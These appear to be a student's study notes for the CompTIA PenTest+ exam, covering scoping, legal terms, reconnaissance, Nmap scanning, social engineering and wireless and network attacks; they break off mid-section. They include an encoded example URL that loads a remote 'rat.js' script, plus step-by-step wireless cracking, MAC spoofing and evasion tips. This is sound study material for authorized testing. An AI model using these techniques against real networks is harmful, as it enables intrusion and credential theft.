CompTIA Pentest+
planning & scoping - 14%
info gathering & vuln scanning - 22%
attack & exploits - 30%
reporting & communication - 18%
tools & code analysis - 16%
165 min, 90 questions
risk management:
- Risk = Threat + Vulnerability
- inherent risk:
- risk that exists in absense of controls
- imact + likelihood
- always some inherent risk
- residual risk:
- risk after implementing controls
- inherent risk + control effectiveness
- risk exception:
- created risk due to exception in or failure to comply with corporate policy
- risk avoidance:
- eliminate hazards
- risk transfer:
- 3rd party handles risk
- risk mitigation:
- minimizes risk
- risk acceptance:
- when cost of other options are too high
- risk appetite/attitude/tolerance:
- how much risk before changing something
access control:
- compensative:
- used in place of primary access control to mitigate risk
- corrective:
- reduce effect of attack
- detective:
- detects and alerts
- deterrent:
- discourages attacks
- directive:
- rules
- AUP (Acceptable Use Policy)
- preventive:
- prevent attacks
- good passwords, etc...
- recovery:
- disaster recovery plans, etc...
- admin/managerial control:
- security awareness training
- logical/technical controls:
- firewalls, monitoring, etc...
- physical controls:
- locks, etc...
Methodology:
- CompTIA phases:
1) planning & scoping
2) info gather/vuln scanning
3) attacks/exploits
4) reporting/communicating
- MITRE ATT&CK:
- attack.mitre.org
- shows all attacks and how to mitigate them
Pentest Standards:
- OWASP
- web application security
- open source
- OWASP top 10:
- most critical security risks and how to prevent them
- OSSTMM
- how to audit/pentest
- open source
- outdated
- ISSAF
- links pentesting steps with tools
- comprehensive guide to pentest
- outdated
- PTES
- cover everything related to pentest (not only attacks)
- outdated
Planning:
- 3 factors:
- time
- cost
- quality
- speak with company for scope, contacts, etc...
- pentest is a snapshot of current security posture
Legal Concepts:
- statement of work (SOW):
- specifies scope, permission to pentest, pay schedule, misc.
- standalone document OR part of MSA
- MSA (Master Service Agreement):
- contract used to quickly negotiate work
- good for reocurring pentests
- most things are agreed to here if used
- SLA (Service Level Agreement):
- expectation of or constraint for mim/max performance of pentest
- used for Security as a Service a lot
- NDA (Non Disclosure Agreement)
- Unilateral: one party discloses info to another which is protected
- Bilateral: two-way disclosure of sensitive info
- Multilateral: multiple parties disclose info that's protected
- both company and pentester should use NDA
Regulatory Compliance:
- PCI DSS:
- standard, not regulation
- created by credit card companies
- vulnerability scans every 90 days required
- companies must follow standards if storing credit card info
1) create and maintain secure infrastructure using dedicated appliances and software
2) employ best practices, change default passwords, train users
3) continually monitor for vulnerabilities
4) provide strong access control mechanisms utilizing least privilege
- security levels:
- Level 1: over 6 million transactions / year
- use internal auditor to be compliant (ISA)
- require external auditor
- QSA (Qualified Security Assessor)
- must complete ROC (Report On Compliance)
- details security posture, protections, etc...
- Level 2: 1-6 million transactions / year
- no external QSA required
- Level 3: 20,000 - 1M transactions / year
- Level 4: under 20,000 transactions / year
- GDPR:
- EU personal data protection
- must have permission for each piece of info taken
- right to be forgotten
- applies globally to all companies that have business in EU
- www.gdpr.eu
- HIPAA: personal health info
- SOX: publically traded US corps
- GLBA: financial institutions, protect PII
- FISMA: federal agencies only
- Federal privacy act: only applies to federal agencies
- FERPA: privacy of student education records
- COPPA: children privacy, no data collection under 13
Scope:
- objectives
- vpn, cloud, wireless
- api, web/mobile apps
Threat Actors:
- Skript Kiddie:
- uses premade tools, least understanding
- Insider Threat:
- current or former employee
- Competitor:
- rogue business, espionage
- Organized Crime:
- monetary gain, well-funded, using any technique to make money!
- Hacktivists:
- politically motivated, making a point or promoting a belief
- State-sponsired Attackers:
- APT (Advanced Persistent Threat)
- well funded, best tools, long-term attacks
- False Flag attack: make one state think another attacked
- framing another country/group
- Categories:
Tier 1) little money, standard tools
Tier 2) little money, specialized tools
Tier 3) lots of money, for profit
Tier 4) lots of money, creating tools
Tier 5) lots of money, creating vulnerabilities and exploits
Tier 6) a ton of money, military, etc...
Target List:
- internal/external:
- inside firewall vs outside of protected network
- 1st / 3rd party providers:
- can you attack the cloud portion?
- physical pentest?
- on-site vs off-site assets:
- data centers located away from HQ for ex (data center in Italy for example)
- which SSIDs?
- which IP ranges
- DNS
- ASN (Autonomous System Number): defines group of IP prefixes run by network
- Domains/Subdomains
- APIs
scope creep:
- when company wants more to be tested than was agreed upon
- document change to SOW
ROE (Rules of Engagement):
- timeline
- when test occurs and how long
- incl date and time for each attack
- locations
- onsite/offsite?
- how many locations?
- know laws of countries that location is in
- time restrictions
- can have no tests at certain times (ex: high network load)
- transparency
- who in organization will know about the pentest
- trusted agent: the member of the organization who knows about the tests
- can provide resources for known environment tests
- boundaries
- what is allowed to use
- social engineering allowed?
Pentest Assessment Types:
- Goals-based:
- specific goal in mind
- pentester finds as many ways as possible to achieve
- doesn't matter how they acheive
- Objectives-based:
- pentester ensures information is secure from as many sides as possible
- Compliance-based:
- regulations being followed properly
- Premerger:
- acquiring company has a third party pentest done on other company
- Supply chain:
- assess security posture of company before including them in the supply chain
- Red team:
- internal pentesters
- unknown/known/partial-known environment tests
- allowed list / excluded list:
- which assets are authorized
- security exceptions:
- may have to ask to be granted a signed certificate or be allowed past firewall
- certificate pinning:
- devices signed with digital certificate
- only these devices can access network
- If an indicator of compromise is found during a pentest, report immediately!
- evidence of a real attacker
Passive Reconnaisance
- Info gathering
- aka footprinting/reconnaisance
- passive means not directly interacting with company
- make a spreadsheet of all info you find
- OSINT
- Metagoofil:
- search metadata of public docs on target website
- relies on python
- multiplatform
- LUI
- The Harvester:
- gather emails, subdomains, hosts, employee names, PGP keys, open ports, etc...
- LUI
- ReconNg:
- system of modules to add features
- more useful than The Harvester
- relies on python
- multiplatform
- LUI
- FOCA:
- find metadata and hidden info in collected docs from a company
- either saved docs or use addon for web search like Metagoofil
- GUI
- NO LINUX COMPATABILITY
- Shodan:
- search engine for security risks
- finds everything insecure
- great for IoT vulnerabilities
- GUI
- Censys:
- search engine for finding hosts and networks across internet with config data
- GUI
- Maltego:
- commercial software for OSINT
- visually map out everything
- automate public source queries and compare to other sources
- like a cork board for police case
- Social media scraping
- start with the company's social media accounts
- linkedin
- DNS info
- A: domain to IPv4 address
- AAAA: domain to IPv6 address
- PTR: IP to domain
- CNAME: domain to another domain/subdomain
- MX: direct email to mail server
- SOA: stores info about zone (who is responsible for domain)
- TXT: adds text to DNS
- SRV: specifies host and port for a specific service
- NS: which DNS name server for the domain (Godaddy, etc...)
- Tools to Query DNS:
- nslookup
- dig
- host
- whois
- lots of info
- registrar name and email
- status of domain
- name servers being used by domain
- can do a zone transfer to local machine for offline analysis (active recon)
- CentralOps
- centralops.net
- browser based tool
- can find:
- domain dossier
- email dossier
- owner of domain
- technical contacts
- technical details
- network ranges
- Public repositories
- github, bitbucket, sourceforge
- look for API keys directly in code
- Website archives!
- wayback.org
- archive.org
- find deleted things that were sensitive
- upload pictures to find info
- Search engine analysis
- google hacking: OSINT technique using google search to locate vuln servers/apps
- advanced searches
- GHDB (Google Hacking DataBase):
- provides database of search strings optimized for finding vuln websites/services
- maintained by Offensive Security
- uses Google Dorks
- "Jason Dion" vs Jason Dion --> search together or each separate
- NOT operator: removes things from search
- ex: "site:diontraining.com -site:sales.diontraining.com financial."
- google results matching "financial" in diontraining.com but nothing from sales.diontraining.com
- AND/OR operators: Jason AND Dion
- filetype:pdf Jaon Dion
- URL Modifiers:
- &pws=0 --> no personalized results
- &filter=0 --> no filters
- &tbs=li:1 --> no autocorrect search terms
- URL Analysis:
- HTTP methods:
- set of request methods indicating what to be performed for a resource
- Request contains:
- method, resource, version number, header, body of request
- GET: retreive data from server
- POST: send data to server for processing
- PUT: creates/replaces resource
- DELETE: remove resource
- HEAD: retreives headers for resource, ignores body
- ? before method
- Query parameters: "name=value&address=value"
- key-value pairs
- # indicates fragment/anchor-ID, not processed by webserver
- HTTP response codes:
- header value returned by server when client requests URL
- 200 = GET/POST success
- 201 = PUT success
- 3xx = redirect
- 4xx = error
- 400 = request couldn't be parsed by server
- 401 = request didn't supply authentication credentials
- 403 = request doesn't have sufficient permissions
- 404 = request non-existent resource
-5xx = server-side issue
- 500 = general error on server
- 502 = bad gateway
- 503 = server overload
- 504 = gateway timeout
* these codes not on test but important
- URL encoding:
- URL cannot contain unsafe characters (that will break things)
- reserved characters = special chars that have meaning in URL
- unreserved characters = normal letters/numbers, etc...
- Percent Encoding:
- allows user to submit unsafe character or binary to server in URL
- can be used for directory traversal, submitting malicious input
- double encoding: encode the percent sign too!
- tricky attack method
- ex: http://diontraining.com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs
- %3C = less than sign '<'
- %3E = greater than sign '>'
- %3Cscript%3E = script --> calling a script
- %27http%3A%2F%2Fabc123.com%2Frat%2Ejs = 'http://abc123.com/rat.JS'
- Total = http://diontraining.com/upload.php?post=script'http://abc123.com/rat.JS
- Upload malicious js script
** on exam
- Cryptographic flaws
- checking CA certificates to see version of SSL/TLS
- SAN field: allows use of certificate with other domains too
- multidomain certificate
- look at this field in the CA cert for other domains to attack
- wildcard certificate: supports subdomains
- *.diontraining.com
- costs more than single domain certificate
- look at this field in the CA cert for other domains to attack
- CRL: list of all revoked certificates by that CA
- client browser looks through all of them to make sure site is good
- when expired or compromised, added to CRL
- OCSP: check revocation status of cert using its unique serial number
- client browser checks OCSP
- faster, easier
- alternative to checking CRL
- Certificate Pinning:
- server side trust certificates that bypass CA chain of trust
- not secure, someone can inject a fake certificate
- not used anymore, deprecated
- Certificate Stapling:
- web server performs certificate status check (instead of browser)
- client browser doesn't have to request OCSP or CRL, therefore faster
- HSTS:
- webserver notifies client browser to only request site with https, not http
- some providers just redirect http to https version of the site instead of using HSTS
- not as secure, can be exploited
- over 100,000 sites listed that should not be able to be accessed via http
- cipher suite:
- defines algo supported by client and server when requesting to use encryption/hashing
- TLS 1.2 cipher suite = ECDHE_RSA_AES128_GCM_SHA256
- ECDHE = eliptic curve diffie helman exchange
- RSA = digital signature
- if using outdated browser, website might downgrade security to be compatible
- ssllabs.com --> show cipher suite for a site
CVE & CWE:
- CERT (Computer Emergency Response Team): cia.gov/uscert
- US fed gov maintained site
- CVE alerts
- JPCERT (Japanese version of CERT): jpcert.or.jp
- similar to CERT
- NVD (National Vulnerability Database): nvd.nist.gov
- maintained by NIST
- lists CVEs with date and security risk
- CVE (Common Vulnerabilities & Exposures):
- cve.org --> all CVEs
- every company submits their vulnerabilities to this database
- CWE (Common Weakness Enumeration):
- cwe.mitre.org
- community maintained list of CWEs
- not vulnerabilities for a specific product & version. These are more common accross all software
- CAPEC (Common Attack Pattern Enumeration Classifications)
- capec.mitre.org
- understand attack patterns for a particular attack
- Full Disclosure:
- NMap maintained list of CVEs & CWEs
* useful when you need to find vulnerabilities on the tech that you are hacking
Active Reconnaissance:
- interacting with target
Scanning & Enumeration:
- finding hosts, open ports, URLs, domain names, services, users
- discovery scan:
- ping scan
- port scan
- enumeration
* Nmap
* Zenmap (GUI)
- fingerprinting:
- find OS, services, software versions on a host
- banner grabbing:
- Netcat, wget, telnet, hping
- Zenmap, Nmap, Metasploit (easier)
- sending modified banners to determine things
- Tier of detail:
1) scanning
2) enumeration
3) fingerprinting
Conducting Enumeration:
- use Zenmap!
Other Enumeration:
- 5 key areas:
- hosts
- enumerating windows:
- net command (windows) --> net /?
- arp command (windows) --> arp -a
- ipconfig (windows) --> ipconfig /displaydns
- enumerating Linux:
- finger (see users and some info)
- uname -a (OS version, name, etc...)
- env (environmental variables)
- services
- Nmap
- domains
- active directory domains, not website domains
- AD (Active Directory):
- Kerberos Auth
- first domain = root domain
- child domains trust root domain
- OU (Organizational Units): group objects in a domain
- users
- Get-NetGroupMember (powershell) --> list domain members belonging to group
- net user (cmd) --> list all users
- net group (cmd) --> list all groups
- URLs
- nmap --script=http-enum
Website Reconnaissance:
- software, OS, hosting, resources, hidden info
- build with programmers, page builder, CMS (Content Management System)
- CMS example = wordpress, shopify, etc...
- well known attacks
- for plain html/css stes, must use xml, sql injections, etc...
- find every page:
- website crawling / forced browsing
- robots.txt file shows which URLs should and shouldn't be looked at by bots like google
- some robots don't care
- DirBuster:
- OWASP tool to find every file, directory and all data
- tests all combinations of letters/words, etc...
- web scraping, web harvesting, web data extraction:
- extract data from website with automation or manually
- CeWL (Custom Word List generator):
- crawl URL to specified depth & return list of words to use with password cracker
- show all emails found
- cewl -d 1 -m 6 -w wordlist.txt https://diontraining.com
- scrape diontraining.com to 1 directory lower than the URL given
- put all words 6 characters or larger into wordlist.txt
Detecting & Evading Defenses:
- load balancers:
- can cause trouble when enumerating
- how to tell if in use:
- get different responses based on which server is replying to you
- LBD (Load Balancing Detector):
- lbd diontraining.com
- shows if there is a load balancer
- firewall:
- how to tell if in use:
- traceroute showing * instead of IP hop means firewall
- how to evade:
- firewalk: determine which layer 4 protocols are allowed
- map out ACL rules
- sends TCP/UDP packets with TTL 1 higher than targeted gateway
- web app firewall:
- how to tell if in use:
- personalized cookies in HTTP packets
- header alterations
- WAF notifications
- how to evade:
- obfuscation to confuse WAF
- antivirus:
- how to evade:
- metamorphic virus: changes as it propogates around computer
- most antivirus software uses Digital Signatures
- changing/jumbling code changes signature
- signature obfuscation:
- allows to change code once
- fileless malware:
- running a script
- encryption:
- signature can't be seen because file is encrypted
- process injection / process hollowing
Packet Crafting:
- changing packets to test things
- stages:
1) assemble: create packet
2) edit: modify created packet
3) play: send/resend packet to network
4) decode: capture/analyze traffic generated by sent packet
- 2 tools:
- hping (command line tool):
- open source spoofing tool
- craft packets to exploit vuln firewalls & IDS/IPS
- Abilities:
- host/port detection & firewall testing
- timestamping
- system uptime
- if server has been up for a year, probably hasn't been updated, need reboot
- traceroute
- fragmentation
- fragment packets to sneak through
- DoS
- scapy (script)
- packet manipulation/generator
- network scanner/discovery
- packet sniffer
- commands:
- scapy3 -h
- using scapy NOT on exam
Eavesdropping:
- social eng / tech (collecting data)
- capturing cellphone com., packet sniffing (all data over wifi)
- Wireshark
- TCPDump
- must place network card into Promiscuous mode to scan traffic
- writes packets into PCAP file
- protocol analyzer (wireshard/tcpdump) will analyze
- passive reconnaissance to collect, nobody knows you're taking info
- active recon to install a system that can do this
- usually traffic captured is encrypted
- even if encrypted, can use for metadata (protocols used, source/dest/ports, data volume)
- flow analysis:
- netflow tool
- highlights trends and patterns in network traffic
- for wired networks, must connect to SPAN/mirrored port to see all traffic
Wardriving:
- find wireless APs to hack by walking/driving around
- wigle.net
- public wardriver OSINT of APs
- antenna for wardriving:
- dBi (Decibels Per Isotropic):
- measures strength of antenna
- 1 is weak, 9 is strong, etc...
- Direction
- unidirectional
- best for wardriving
- 9dBi can allow you to sit accross the street and still access building
- bidirectional
- omnidirectional
- most wireless cards
- less distance even with higher dBi because radiates equally in all directions
- best for initially finding APs, see all directions
- SNR (Signal Noise Ratio):
- how strong signal is relative to background noise
- low number = low signal, high noise
- can also capture satellite/microwave data being send to ISP
Vulnerability Scanning
- assessing devices/apps/network for known weaknesses
- attack surface = all the places vulnerabilities can exist
- closing ports will reduce attack surface
Vulnerability Lifecycle:
- vulnerabililty: any weakness in a system
- 5 step process:
1) discover
- id vulnerability
- create exploit
2) coordinate
- report vulnerability
- generate CVE
3) mitigate
- release CVE
- create patch
4) manage
- deploy patch
- test system
5) document
- record results
- lessons learned
- risk gap:
- when a CVE is released without a patch being put out
- 5-10% of systems still have unmittigated CVEs
Vulnerability Scans:
- credentialed scan:
- using admin user/passwd to get more detailed info
- non-credentialed scan:
- outside attacker without admin priv
- types of scans:
- discovery scans:
- least intrusive
- learn about the network topology
- ping sweep
- full vulnerability scans:
- more in depth
- easy to detect for defenders
- stealth scans:
- send syn packet, receive syn/ack packet, send rst packet
- never finish 3-way handshake, not logged by server
- some IPS/IDS will detect
- tips for evading IDS/IPS:
- slow down scans
- break into individual scans
- mask true source (tor)
- compliance scans:
- PCI DSS
- HIPAA
- Tools:
- openvas, nessus, qualysguard, nexpose, nmap
Scanning Considerations:
- considerations to minimize effects to organization:
- time
- when to conduct scan?
- protocols
- which ports to scan?
- network topology
- where to scan from? inside/outside firewall?
- bandwidth limitations
- don't accidentally DoS
- query throttling
- reduce number of queries launched by scanner at a given time
- fragile systems
- SCADA/ICS for example
Nmap
Nmap Discovery Scans:
- footprinting
- nmap
- ex: nmap 192.168.1.0/24
- Default Scan:
- ping and send TCP ack packets to ports 80 & 443 on all hosts
- port scan all ports
- not stealthy
- Ping Scan / Host Discovery Scan:
- nmap -sn 192.168.1.0/24
- finds all hosts
- doesn't scan ports
- List Scan:
- nmap -sl
- lists IP addresses from supplied target ranges and perform reverse-DNS query to find hostnames for the IPs
- like DNS lookup
- TCP SYN Ping:
- nmap -PS
- probes specific ports from list using SYN packets instead of ICMP to conduct ping
- some networks block ICMP, this will evade protection
- Sparse Scanning:
- nmap --scan-delay
- issue probes with significant delay
- stealthy
- Scan Timing:
- nmap -Tn
- issue probes using timing pattern (n)
- 0 = slowest & 5 = fastest
- replace 'n' with number
- ex: nmap -T5
- TCP Idle Scan:
- nmap -sI
- stealth method
- appears as if another machine started a scan (zombie)
- hode true identity
- Fragmentation:
- nmap -f OR nmap --mtu
- splits TCP header of each probe into pieces
- File Saving:
- Normal:
- oN
- XML:
- oX
- Grepable:
- oG
Nmap Port Scans:
- service discovery
- can take minutes or hours
- TCP SYN:
- nmap -sS
- half open scan
- sends RST packet after SYN/ACK received
- finds out which ports are open based on responses
- requires root/admin access on system you're scanning
- TCP Connect:
- nmap -sT
- full 3-way handshake
- may need to do this if you don't have rights to do TCP SYN
- Null Scan:
- nmap -sN
- sends packet with header bit = 0
- easily detectable
- FIN Scan:
- nmap -sF
- send unexpected FIN packet
- not stealthy
- Xmas Scan:
- nmap -sX
- sets FIN, PSH, URG flags set to 1
- LEAST Stealthy
- UDP Scan:
- nmap -sU
- send UDP packet to target instead of TCP
- no SYN/ACK/FIN for UDP
- just have to wait for response or timeout
- stealthy
- OS Scan:
- nmap -O
- OS version of target
- Port Range:
- nmap -p
- target specified ports
- without this, default is to scan 1000 most used ports
- default is not stealthy
- Port States:
- Open:
- application on host is accepting connections
- Closed:
- port responds with RST packet, not accepting connections
- Filtered:
- nmap can't probe the port but doesn't know it's closed
- due to firewall
- Unfiltered:
- nmap can probe port but can't determine if open/closed
- not common
- Open|Filtered:
- nmap can't determine if port is open or filtered
- common for UDP or IP scan (no SYN/ACK/FIN/RST)
- Closed|Filtered:
- nmap can't determine if port is closed or filtered
- common with TCP Idle Scan
Nmap Fingerprinting:
- list of resources on network/host/system to id potential targets
- intensive fingerprinting:
- protocols in use
- application name and version
- OS type and version
- host name
- device type
- Intensive Port Scans:
- nmap -sV
- basic versioning info of service
- nmap -A
- most amount of data possible
- CPE (Common Platform Enumeration):
- scheme to id hardware devices, OSs and apps developed by MITRE
- every OS and app and hardware device responds a tiny bit differently to TCP/UDP packets
- Nmap uses this to find all the information it gives you
Nmap Scripting Engine:
- OS detection and platform enumeration
- windows user account discovery
- id logged on windows user
- basic vulnerability detection
- get HTTP data and id apps
- add geolocation to traceroute probes
- EXAM only need:
- nmap --script=http-enum
Social Engineering & Physical Attacks
- all technical computer based protections can be usurped by one employee clicking the wrong link
Methods of Influence:
1) Authority
- pretending to be a boss/important client/Gov agency
- phishing emails from fake bank/gov
2) Urgency
- deadlines
3) Social Proof
- something that has more likes/shares
4) Scarcity
- get people to act quick
- limited supply
- only 2 macbooks left for 9.99! click here
5) Likeness/Likeability
- having charisma
- pretty people
6) Fear
- threats/demands
- ransomeware
Social Engineering:
- phishing
- email to many people
- spearphishing
- email to specific person
- whaling
- email to high ranking person
- smishing
- SMS/MMS messaging
- vishing
- calling
- pharming:
- tricks users to divulge private info by redirecting victim to website controlled by attacker
- BEC (Business Email Compromise):
- attacker takes over high-level exec email account and orders employees to do x
Phishing Campaigns:
- trendmicro phishinsight
- create very good phishing emails
- schedule them to send out to your employees to test them
- train people who fail the test
Pretexting:
- pretending to be someone from a company, providing a reason for getting info
Baiting Victims:
- USB drop key:
- someone picks up a USB off the floor and plugs it in
- giving someone a USB to do something with
- Rubber Ducky:
- specialized software on USB to run commands when plugged in
- root shells, key logging, etc...
- Watering hole attack:
- site that people return to a lot
- putting malware on the site that people go to a lot
- making a fake site similar to what they go to
- Typosquatting/URL Hijacking:
- website URL that looks almost the same as another
Impersonation:
- pretending to be someone else
- E-bay you can buy uniforms for any company
- elicitation: asking for info
Physical Security:
- 3 main areas:
- perimeter
- fences, dogs, guards
- building
- locks, cameras, guards, access control vestibules (Mantrap)
- room/datacenter
- keys, cypher locks, electronic access, etc...
- Cameras:
- signal jamming wireless CCTV cameras / cutting cables
- pan tilt zoom (PTZ) cameras
- chill lens to make blurry
- infrared camera
- ultrasonic system
- Access Control Vestibule:
- tailgating
- piggybacking
- badge cloning
- Locks:
- physical key, PIN, wireless signal, biometrics
- Biometrics:
- FAR (False Acceptance Rate)
- higher is easier to hack in
- FRR (False Rejection Rate)
- higher means authorized people can't even get in
- CER (Crossover Error Rate)
- where FAR & FRR intersect on a graph
- equal amount of FAR & FRR
- perfect amount of sensitivity for biometrics
Lock Picking:
Physical Attacks:
- Tailgating
- employee doesn't know
- Piggybacking
- employee agrees to let you in on their access card
- Shoulder Surfing
- Eavesdropping
- Dumpster Diving
- Badge Cloning
Social Engineering Tools
- SET (Social Engineering Toolkit)
- BeEF (Browser Exploitation Framework)
- assess security posture of target environment using cross-site attacks
- can do things similar to Burp
- call spoofing tools:
- Asterik
- create phone number on VOIP
Wireless Attacks
Wireless Security:
- PSK (pre-shared key):
- AP uses same encryption key to encrypt and decrypt data
- password to get on your wifi network
- WEP
- original 802.11 wireless security
- 40 bit pre-shared encryption key with RC4 encryption cipher
- 24 bit IV (Initialization Vector)
- sent in the clear
- biggest weakness
- WPA
- TKIP 48 bit IV
- MIC & RC4
- WPA2
- 802.11i
- CCMP, AES 128 bit encryption key
- personal mode / enterprise mode (central auth server - RADIUS/TACACS)
- WPA3
- enterprise mode = 256 bit AES w SHA-384
- personal mode = 128 bit AES w CCMP
- NO MORE PRE-SHARED KEYS!!!
- SAE (Simultaneous Authentication of Equals):
- AKA Dragonfly handshake
- perfect forward secrecy (session key can't be compromised even if password is)
- uses one time use session keys usually using Diffie-Helman/TLS
- uses session key to encrypt & decrypt data
- every so often, new one time use session key is renegotiated
- WPS
- press button on AP and on device, enter PIN, device connects and joins network
- 8 digit PIN code
- last digit = checksum (really 7 digit)
- was split into 4-digit & 3-digit pieces + 1-digit checksum
- doesn't encrypt well at all
- easy to brute force each of the PINs separately
- only 10,000 combinations for a 4 digit PIN
- MAC Filtering:
- doesn't really protect anything, can spoof easily
- macchanger -a --> change mac to random, if on a block list
- Weaknesses:
- Open: no security/encryption
- WEP: IV (Initialization Vector)
- WPA: RC4 & TKIP
- WPA2: AES & CCMP
- WPA3: Dragonfly
- WPS: 4 digit encryption
Bypassing MAC Filtering:
1) ensure NIC is in monitor mode:
- iwconfig --> verify mode
- airmon-ng start wlan0 --> enable monitor mode
2) scan devices to see which one to spoof
- airodump-ng wlan0mon --> scan
- find device and copy MAC
3) shutdown network card
- ifconfig wlan0mon --> shutdown
4) change MAC
- macchanger -r wlan0mon --> assign new random MAC
- macchanger -m --> assign a specific MAC
Signal Exploitation:
- Types of Antennas:
- Strength
- dBi (Decibels Per Isotropic):
- measures strength of antenna
- 1 is weak, 9 is strong, etc...
- Direction
- unidirectional
- best for wardriving
- 9dBi can allow you to sit accross the street and still access building
- Yagi antenna, used for building to building connection links
- bidirectional
- omnidirectional
- most wireless cards
- less distance even with higher dBi because radiates equally in all directions
- best for initially finding APs, see all directions
- SNR (Signal Noise Ratio):
- how strong signal is relative to background noise
- low number = low signal, high noise
- can also capture satellite/microwave data being send to ISP
- Types of Exploitation:
- Eavesdropping
- promiscuous mode:
- NIC mode to access/view all network traffic
- Deauthentication
- boot a victim off an AP to get them to reauthenticate
- send out management frame to AP while spoofing MAC of victim
- gives you a chance to capture the PSK when they re-authenticate
- OR get them to connect to an Evil Twin
- Aireplay-ng --> tool for deauthentication attacks
- Jamming
- disrupts wifi signal by broadcasting on same frequency as target AP
- blocks sending & receiving data
- can be used for wireless CCTV cameras
- dedicated hardware jammers / scripts & software tools
- python script 'wifi jammer' disrupts all wireless APs in an area
- can be more specific with target too
- illegal in many places
WEP Hacking:
- 24-bit IV weakness
- Tools in Aircrack-NG:
- Airomon-NG:
- set monitor/promiscuous mode, see wireless frequencies to id APs and clients
- Airodump-NG:
- capture network traffic and save to PCAP file
- Airocrack-NG:
- brute force / dictionary attack password crack of wireless encryption
- Aireplay-NG:
- deauthentication attack, spoofed deauth request to AP
- Steps:
1) monitor network to find which APs and clients are in use
- Airomon-NG
2) capture all network traffic into PCAP file to crack it offline later
- Airodump-NG
3) conduct deauthentication attack to generate handshakes to capture
- Aireplay-NG
4) crack encryption protocol to find plain text PSK
- Airocrack-NG
- normally takes ~3 min
*** EXAM DOESN'T REQUIRE KNOWING HOW TO PERFORM ANY WIRELESS ATTACK ***
- still check out the video to see how to do it anyway! very cool!
*** do need to know what each part of aircrack-ng does ***
WPA/WPA2 Hacking:
- same steps as in WEP
- only part that's different is using a dictionary attack offline on the PSK
- still done with aircrack-ng
WPS PIN Attacks:
- Programs to use:
- Wash
- similar to airomon-ng but focused on WPS
- Reaver
- similar to aircrack-ng but for WPS
- brute forces PIN for WPS
- Bully
- get wifi password from WPS PIN
Evil Twins:
- Wifiphisher --> tool to setup Evil Twin
- Wi-fi Pineapple --> hardware to automate wifi auditing, create vuln reports
- rogue access points
- fraudulent AP that appears to be legit
- setup to eavesdrop
- often use captive portal for users to sign in
- can allow them to connect via google/facebook, etc...
- steal their credentials easily
- ESPortalV2 --> tool for this
- Steps to setup Evil Twin:
1) setup AP with same SSID with greater signal than legit AP
2) conduct deauth attacks to force users to connect to your evil twin
- Karma Attack:
- variation of evil twin attack
- exploits behaviour of wifi devices due to lack of AP auth protocols being implemented
- vulnerable client broadcasts PNL (Preferred Network List)
- list of SSIDs of any AP that it has previously connected to
- auto-connects to these when in range
- just change your AP to be the same as one in the PNL for them to connect
- Karma Attack = auto-connect to already known SSID
- Evil Twin Attack = manually connect to SSID
On-Path & Relay Attacks:
- man in the middle
- attacker is between victim and intended destination
- on path attack
- able to read data
- relay attack
- able to modify data before sending
- easiest way is Evil Twin
- 802.1x:
- port based network access control (NAC)
- enterprise mode
- supplicant (client) connects to authenticator which checks authentication server
- EAP used to create encrypted tunnel from supplicant to authentication server
- evil twin steps:
- same as normal evil twin except extra steps
- provide forged digital certificate to client trying to connect (so they do)
- evil twin forwards everything to the actual server and acts as a relay/proxy
Bluetooth Attacks:
- Bluejacking
- sending unsolicited messages to bt device
- turn off discoverable mode when not connecting
- Bluesnarfing
- stealing information through bluetooth connection
- turn off discoverable mode when not connecting
- BlueBorne
- gain complete control of a device without being connected
- 8 vulnerabilities on all devices
- BLE (Bluetooth Low Energy)
- type of bluetooth that uses less energy
- common in IoT, smart home devices
- hard to get in range
- Tools:
- HCICONFIG
- config bt interface
- HCITOOL
- scan & discover devices
- BLEAH
- enumerate devices
- GATTTOOL/BETTERCAP/BLUEPY
- interact with bt devices
- Spooftooph
- automates spoofing or cloning of bt device's name/class/address
*** SPOOFTOOPH IS THE ONLY BT TOOL ON THE EXAM ***
RFID & NFC Attacks:
- RFID:
- badge cloning
- need reader/writer
- NFC:
- shorter range
- android based cloning apps
- NFC amplification attack:
- read signals from longer distances (10cm)
Network Attacks
Stress Testing:
- software testing method
- extreme load on processing/memory/storage, etc...
- likely to cause DoS
- helps understand limits and what architecture is needed
- methods:
- python/powershell scripts
- open source software tools
- SaaS solutions
- technicals:
- packet/broadcast storm
- large increase in traffic directed at a target
- random data sequence
- Character Generator Protocol
- over TCP/UDP port 19
- sends characters & measures
Exploit Resources:
- Exploit Database
- exploit.db.com
- complete collection of exploits and vulnerable software
- Packet Storm
- packetstormsecurity.com
- new articles, advisories, whitepapers, tools and exploits
- Exploit Chaining:
- chaining multiple exploits together to break through
- can be simultaneous or sequential
ARP Poisoning:
- ARP spoofing is a type of ARP poisoning
- send false ARP messages to get ARP caches to update with new info
- binds MAC to wrong IP
- steps:
1) id MACs and IPs w Wireshark/Nmap
2) use spoofing tool like Arpspoof/Metasploit
- protections:
- VLAN segmentation
- DHCP snooping
DNS Cache Poisoning:
- DNS function
- entering a domain to browser, computer checks it's own cache for IP
- if not there, sends to DNS server
- Cache Poisoning:
- changing resolution IP on DNS server or local computer cache or router
- make a website redirect to another
- put resolving IP in cache on device so that it always goes there
- on a company's DNS server, resolve FB to your own FB clone site
- steps:
1) check if DNS server uses recursion
2) if recursion is enabled, conduct dynamic DNS update without authentication
- methods:
- poisoning DNS cache
- hijacking local DNS server
- unauthorized DNS zone transfer
- replicating DNS database entries across set of DNS servers
- nslookup --> windows | dig axfr --> Linux | Nmap script
- protections:
- DNSSEC
- uses encrypted digital signatures when passing DNS info between servers
- ensures latest security updates
- prevents most poisoning with public key cryptography
LLMNR/NBT-NS Poisoning:
- LLMNR (Link Local Multicast Name Resolution)
- based on DNS packet format
- allows IPv4 & IPv6 hosts to perform name resolution if on same local link
- can be used with ad-hoc wifi connections
- LLMNR is an alternative to DNS if there is no DNS server on local network
- Windows/Mac only
- Linux uses ZerConf using SystemD
- NBT-NS (NetBIOS Name Service)
- part of NetBIOS over TCP protocol suite
- name resolution inside internal network
- translates internal names to IPs
- Windows & Linux
- Windows defaults to LLMNR but will use NBT-NS if fails
- Poisoning:
- Responder: Kali tool
- must already have access to LLMNR/NBT-NS server
- very similar to DNS poisoning
MAC Spoofing:
- sudo ifconfig en0 ether
- macchanger -m wlan0mon
- macchanger -r
- random change
- useful if coffee shop kicks you off their network after certain amount of time by adding you to block list
VLAN Hopping:
- exploits a misconfiguration to direct traffic to a different VLAN
- methods:
- double tagging
- outer 802.1Q tag shows Native VLAN
- inner 802.1Q tag shows actual destination set by attacker
- one way trip, dest won't double tag their data to send back to you
- protections:
